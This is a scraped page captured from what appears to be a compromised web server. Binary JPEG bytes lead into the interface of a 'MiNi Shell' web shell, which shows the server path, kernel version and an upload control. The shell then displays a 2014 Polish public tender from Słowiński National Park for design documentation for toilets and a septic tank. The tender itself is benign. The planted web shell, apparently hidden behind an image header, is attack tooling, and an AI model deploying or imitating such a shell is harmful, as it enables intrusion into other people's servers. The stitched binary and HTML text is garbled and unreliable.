JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141105/232075-N-2014.html

<p class="kh_header"><b>Smołdzino: Opracowanie dokumentacji techniczno - kosztorysowej</b><br>
<b>Numer ogłoszenia: 232075 - 2014; data zamieszczenia: 05.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Słowiński Park Narodowy , ul. Bohaterów Warszawy 1A, 76-214 Smołdzino, woj. pomorskie, tel. 59 8117204, faks 59 8117509.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.slowinskipn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Osoba Prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji techniczno - kosztorysowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest:
1) opracowaniu dokumentacji techniczno - kosztorysowej dla: 
a) zad.nr 1- opracowaniu dokumentacji techniczno - kosztorysowej dla budowy sanitariatów w Rąbce,
b) zad. nr 2 - opracowaniu dokumentacji techniczno - kosztorysowej dla budowy sanitariatów w Czołpinie działka nr 20/3,
c) zad. nr 3 - opracowaniu dokumentacji techniczno - kosztorysowej dla budowy zbiornika bezodpływowego dla istniejącego kontenera sanitarnego w Czołpinie działka nr 21/4,
2) pełnieniu nadzoru autorskiego nad realizacją robót dla zadań wymienionych w pkt. 1 a),b), c); zgodnie z opisem przedmiotu zamówienia - załącznikiem nr 7 do SIWZ
2. Szczegółowy zakres przedmiotu zamówienia obejmuje: 
1)	Prace poprzedzające opracowanie przez Wykonawcę dokumentacji projektowej:
a)	wykonanie niezbędnych pomiarów inwentaryzacyjnych oraz badań geotechnicznych;
b)	uzyskanie, w razie potrzeby, dodatkowych danych i warunków technicznych od gestorów sieci oraz postanowień i uzgodnień od innych podmiotów;
c)	opracowanie map sytuacyjno-wysokościowych do celów projektowych wraz 
z niezbędnymi uzgodnieniami,
d)	opracowanie projektu koncepcyjnego na mapie do celów projektowych przedstawiającego minimum dwa warianty rozwiązań architektoniczno - konstrukcyjnych, zagospodarowania terenu oraz Kartę Informacyjną Przedsięwzięcia - przed przystąpieniem do dalszych prac projektowych uzyskanie akceptacji Zamawiającego dla jednego z tych wariantów w terminie 60 dni kalendarzowych od podpisania umowy, 
e)	w razie potrzeby przygotowanie i złożenie wniosków do urzędu gminy o wydanie decyzji o środowiskowych uwarunkowaniach na realizację inwestycji, decyzji o warunkach zabudowy i decyzji wodno - prawnej, 
f)	w razie nałożenia obowiązku sporządzenie raportu oddziaływania na środowisko i operatu wodno - prawnego, 
g)	wykonanie innych  opracowań niezbędnych celem uzyskania decyzji o pozwoleniu na budowę;
2)	Opracowanie i uzgodnienie projektu budowlanego wchodzącego w skład dokumentacji projektowej z rzeczoznawcą ds. sanit.-hig. i z Działem Administracji Zamawiającego oraz uzyskanie ostatecznej akceptacji Zamawiającego dla projektu budowlanego przed przystąpieniem do opracowania pozostałej części przedmiotu  zamówienia. Ponadto należy uzyskać wszelkie inne uzgodnienia podmiotów zewnętrznych oraz ewentualne odstępstwa od obowiązujących warunków technicznych celem uzyskania decyzji o pozwoleniu na budowę;
3)	Opracowanie pozostałej dokumentacji projektowej;
4)	Opracowanie przedmiarów robót i kosztorysów inwestorskich;
5)	Opracowanie Specyfikacji technicznych wykonania i odbioru robót budowlanych;
6)	Wykonanie niezbędnych opracowań i uzyskanie wszelkich koniecznych uzgodnień i decyzji administracyjnych umożliwiających realizację robót;
7)	Wykonanie dwóch kompletów dokumentacji w wersji elektronicznej - na zasadach określonych w § 7 umowy, w tym w zapisie w PDF i dodatkowo rysunków w DWG,
8)	Przygotowanie i złożenie w imieniu Zamawiającego kompletnych wniosków wraz z niezbędną dokumentacją do właściwego organu w celu uzyskania decyzji administracyjnych umożliwiających realizację robót,
9)	Uzyskanie ostatecznych decyzji o pozwoleniu na budowę;
10)	Dostarczenie na bieżąco Zamawiającemu kopię wszelkiej korespondencji związanej z uzyskaniem niezbędnych opinii, decyzji i uzgodnień,
11)	Pełnienie nadzoru autorskiego nad realizacją robót zgodnie z opracowaną przez Wykonawcę dokumentacją techniczno-kosztorysową przy założeniu : ogółem 11 pobytów projektantów wszystkich branż na budowach w tym;
a)	po 4 pobyty na budowę sanitariatów (zadanie nr 1 i 2) 
b)	po 3 pobyty na budowę zbiornika bezodpływowego (zadanie nr 3).
Szczegółowy opis zakresu prac zawiera załącznik nr 7 do SIWZ.
Opracowana dokumentacja posłuży do wykonania robót budowlanych na terenie Parku Narodowego i obszarach Natura 2000, na których obowiązują przepisy ustawy o ochronie przyrody.
3.Wymagany termin realizacji zamówienia w zakresie dokumentacji i uzyskania decyzji - do 29.05.2015r.Planowany termin rozpoczęcia nadzoru autorskiego Zamawiający przewiduje w  2015  roku.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.70.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 900,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu oceny spełniania warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla potwierdzenia posiadania wiedzy i doświadczenia Zamawiający będzie wymagał od Wykonawcy doświadczenia w wykonaniu, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch dokumentacji techniczno - kosztorysowych obejmujących swym zakresem budowę lub przebudowę sanitariatów o wartości nie mniejszej niż 10.000zł dla każdej z prac oraz co najmniej jednej dokumentacji techniczno - kosztorysowej obejmującej swym zakresem budowę lub przebudowę zbiorników bezodpływowych o wartości nie mniejszej niż 5.000zł</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu oceny spełniania warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla potwierdzenia dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia Zamawiający będzie wymagał od Wykonawcy dysponowania co najmniej jedną osobą z uprawnieniami do projektowania bez ograniczeń w branży:
- konstrukcyjno - budowlanej,
- sanitarnej
Zamawiający dopuszcza łączenie uprawnień</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu oceny spełniania warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Pisemne zobowiązanie podmiotów oddających do dyspozycji Wykonawcy niezbędne zasoby na okres korzystania z nich przy wykonaniu zamówienia w przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu oraz osobach zdolnych do wykonania zamówienia innych podmiotów niezależnie od charakteru prawnego łączących go z nim stosunków - załącznik nr 2.3 do SIWZ
2) Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia zobowiązany jest do złożenia odrębnego oświadczenia o braku podstaw do wykluczenia z postępowania oraz listy podmiotów należących do tej samej grupy kapitałowej lub informacji o nie przynależności do grupy kapitałowej
3) Wykonawca  powierzający części zamówienia podwykonawcom, zobowiązany jest wskazać w ofercie (załącznik nr 1 do SIWZ) części zamówienia, których wykonanie zamierza powierzyć podwykonawcom. W tym przypadku bierze na siebie pełną odpowiedzialność za czynności podjęte przez podwykonawcę.
4) Pełnomocnictwo w przypadku Wykonawców wspólnie ubiegający się o udzielenie zamówienia,  którzy zobowiązani  są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia  publicznego i zawarcia umowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Warunki płatności - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Zamawiający przewiduje możliwość zmiany terminu realizacji zamówienia o którym mowa w pkt 4.1 SIWZ w przypadku przedłużenia się procedur uzyskania decyzji administracyjnych, za które Wykonawca nie ponosi odpowiedzialności pomimo zachowania należytej staranności. 
2) Zmiana terminu wykonania  przedmiotu umowy nie może przekroczyć czasu trwania okoliczności, o których mowa w pkt 1 oraz czasu niezbędnego do usunięcia skutków tych okoliczności.
3) Zamawiający przewiduje możliwość zmiany terminu rozpoczęcia nadzoru, który uzależniony będzie od terminu rozpoczęcia i trwania robót realizowanych na podstawie dokumentacji wykonanej w ramach niniejszej umowy. 
4) Zamawiający  dopuszcza możliwość zmian w zespole osób wykonujących zamówienie w przypadku zaistnienia niezawinionych przez Wykonawcę zdarzeń losowych lub ustania więzi prawnych łączących go z nimi. W tych przypadkach Wykonawca zobowiązany jest do zgłoszenia do Zamawiającego i udokumentowania tych zdarzeń. Osoby które wejdą w skład zespołu Wykonawcy muszą spełniać wymagania określone w pkt 5.2.1)b) SIWZ, a Wykonawca udokumentuje spełnianie tych wymogów
5) W przypadku ustawowej zmiany stawki  podatku od towarów i usług, Zamawiający przewiduje możliwość zmiany wynagrodzenia brutto w części dot. wynagrodzenia za nadzór autorski, - zmianie ulegnie odpowiednio część wynagrodzenia brutto.
6) W przypadku nie przystąpienia przez Zamawiającego do realizacji robót budowlanych z przyczyn niezależnych od Zamawiającego, w okresie ustawowo przewidzianym na wszczęcie prac na podstawie decyzji administracyjnych umożliwiających realizację robót - Wykonawca będzie zwolniony z obowiązku świadczenia usługi pełnienia nadzoru autorskiego; w takim przypadku nie otrzyma wynagrodzenia za tę część zamówienia i nie będą przysługiwać mu z tego tytułu roszczenia odszkodowawcze.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.slowinskipn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Słowiński Park Narodowy
ul. Bohaterów Warszawy 1A
76-214 Smołdzino.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.11.2014 godzina 12:00, miejsce: sekretariat
Słowińskiego Parku Narodowego
ul. Bohaterów Warszawy 1A
76-214 Smołdzino.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com